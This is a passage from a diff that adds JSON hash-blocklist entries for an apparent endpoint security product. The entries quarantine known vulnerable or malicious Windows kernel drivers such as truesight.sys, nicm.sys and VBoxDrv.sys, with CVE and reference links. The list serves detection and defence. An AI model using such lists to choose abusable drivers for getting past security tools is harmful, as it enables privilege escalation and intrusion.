+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a2208d9-53d4-5fd5-9e59-9ef6103c2146",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605664Z",
+ "creation_date": "2026-03-23T11:45:29.605666Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605671Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c7e5b25a33a7805c999d318a9523fcae46695a89f55bbdb8bb9087360323dfc",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a22df87-9594-59c1-ac75-befa3c6bf7dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156038Z",
+ "creation_date": "2026-03-23T11:45:31.156040Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156045Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9f42d07ed108ef9de0b48f2bfd0f2d427d9c5241873447167744ff3b7472449a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a22f1b9-9f22-58cd-a12c-a219038f8d59",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615765Z",
+ "creation_date": "2026-03-23T11:45:29.615767Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615772Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f8ffb8a23be71c26f784905110b7e752473be55216300d08a83c40c1496fb6c1",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a2ad231-5a70-5535-9ef1-0535e61cc99a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157118Z",
+ "creation_date": "2026-03-23T11:45:31.157120Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157125Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f07b4f831e0d5e9be4c6a9a188ac6a4e3ca45f1abdea83e7480d101774a6a3e7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a3d3ba8-1176-5e41-a0d4-b5b436a54b07",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982414Z",
+ "creation_date": "2026-03-23T11:45:29.982416Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982421Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a2b0b2e9e458016b22ebbf47411008f0a87efd9103b125870ce37246ab5bdff0",
+ "comment": "Vulnerable Kernel Driver (aka aswVmm.sys) [https://www.loldrivers.io/drivers/a845a05c-5357-4b78-9783-16b4d34b2cb0/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a4fe9b3-0c6b-55d4-adf4-fbfa1f735f13",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825593Z",
+ "creation_date": "2026-03-23T11:45:31.825595Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825600Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec3003c1ace455256ab24047d65f50436268e6a1f9ed7f1058a3ee77672a21f8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a529ee2-9b47-597d-a1a2-9fb14b7e6ea5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477708Z",
+ "creation_date": "2026-03-23T11:45:31.477712Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477723Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee55d61ce6082a9f8ff1e8e9fe83e1b52890d59260a12edcb44afb3a5250a537",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a54338d-758c-5467-b153-dd1318ccdc80",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981402Z",
+ "creation_date": "2026-03-23T11:45:29.981404Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981410Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cf66fcbcb8b2ea7fb4398f398b7480c50f6a451b51367718c36330182c1bb496",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a5abda5-9e61-552f-aaba-fe7d2289d432",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608223Z",
+ "creation_date": "2026-03-23T11:45:29.608228Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608233Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f17b59039d2d47d6c653a7abce7b4b24e20e5501ac9fb1ec6893873f4cf006e",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a5b7f1c-051b-5d2d-ad3c-5b4c4fad75e8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823851Z",
+ "creation_date": "2026-03-23T11:45:31.823853Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823859Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1cb5cd25ba016bb5aa00c045dd437332fa72994054c106ea0e259ce5ab25a9e1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a5c4486-23c5-59d6-a877-eda5c41e6614",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453011Z",
+ "creation_date": "2026-03-23T11:45:30.453014Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453023Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e728b259113d772b4e96466ab8fe18980f37c36f187b286361c852bd88101717",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a5feb19-4a14-5a6e-bce6-f04a61b1fc5d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491849Z",
+ "creation_date": "2026-03-23T11:45:31.491851Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491856Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "624168346c02a53d6ca4dcd027538f26dab8e065511538d2c935e67ce72aa111",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a65c004-7909-54ea-9757-9f2ee1cac567",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142506Z",
+ "creation_date": "2026-03-23T11:45:31.142508Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142514Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "921f3df0ae9e95f2195ee2dd2ef21d044e63ade12c1ad494378e6f3b55793402",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a70c169-f44e-57ce-aecd-8a29585ea16e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144129Z",
+ "creation_date": "2026-03-23T11:45:32.144131Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144136Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "94b87b1cdaf1d86c2bc4eacef45608d0f16fdd3b981b88cdddc16b6bc64fe25d",
+ "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a70e384-b711-5965-88f3-cf3e71c5f093",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820513Z",
+ "creation_date": "2026-03-23T11:45:30.820515Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820520Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c3db6290145dc8905c0f97e218e0ef071f435a6ffaf1ed4c0699605d9a540038",
+ "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a7c82e3-b069-5c07-a04f-4d2c35bc2aa9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475730Z",
+ "creation_date": "2026-03-23T11:45:30.475744Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475753Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d16a59cd7c52d1d32bb43670cdca739aadb19ba15996bac62071845e1bfbdb95",
+ "comment": "Malicious Kernel Driver (aka wfshbr64.sys) [https://www.loldrivers.io/drivers/ddf661c0-7dfc-4c26-89c5-00cd6a81a139/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a8b0cc6-e401-55af-921d-57af9a41fdc0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826407Z",
+ "creation_date": "2026-03-23T11:45:30.826409Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826415Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1a5825678ad989a0a02642a001aad3504e2487e0b88c836327ff56d7f9c9ea49",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a8bbc39-5a9b-53bc-ab72-0d678e4cf286",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453783Z",
+ "creation_date": "2026-03-23T11:45:30.453787Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453796Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "16e924aa8ced646c2ee99602b523f511ea386b78ed78a3d265a560fb64e88ee3",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a90a483-aa0c-51e0-8d2d-a9878fe0399b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809990Z",
+ "creation_date": "2026-03-23T11:45:31.809993Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809999Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d512fe03a7722259d0c3b23db809c2c2c4dc8dfc2ac2ec9a2d49447c875e6d58",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a95640b-f703-529f-b9c6-06da7973b899",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985008Z",
+ "creation_date": "2026-03-23T11:45:29.985010Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985016Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "80cbba9f404df3e642f22c476664d63d7c229d45d34f5cd0e19c65eb41becec3",
+ "comment": "Dangerous Physmem Kernel Driver (aka Dh_Kernel.Sys) [https://www.loldrivers.io/drivers/dfce8b0f-d857-4808-80ef-61273c7a4183/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0aacd36d-1371-50a7-b3cc-683dfacd1166",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619456Z",
+ "creation_date": "2026-03-23T11:45:29.619458Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619464Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1044ea40d459fe4c619a44afe53e6ff5a9cc5a37cf568d974ae23ed62da58759",
+ "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0aae4fa0-32fa-53f6-97b5-020c5cc7aa11",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977171Z",
+ "creation_date": "2026-03-23T11:45:29.977173Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977179Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f4c7e94a7c2e49b130671b573a9e4ff4527a777978f371c659c3f97c14d126de",
+ "comment": "ASUS vulnerable VGA Kernel Mode Driver (aka EIO.sys) [https://www.loldrivers.io/drivers/f654ad84-c61d-477c-a0b2-d153b927dfcc/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ab1e3ae-62ad-5cb0-969f-d240a36e541c",
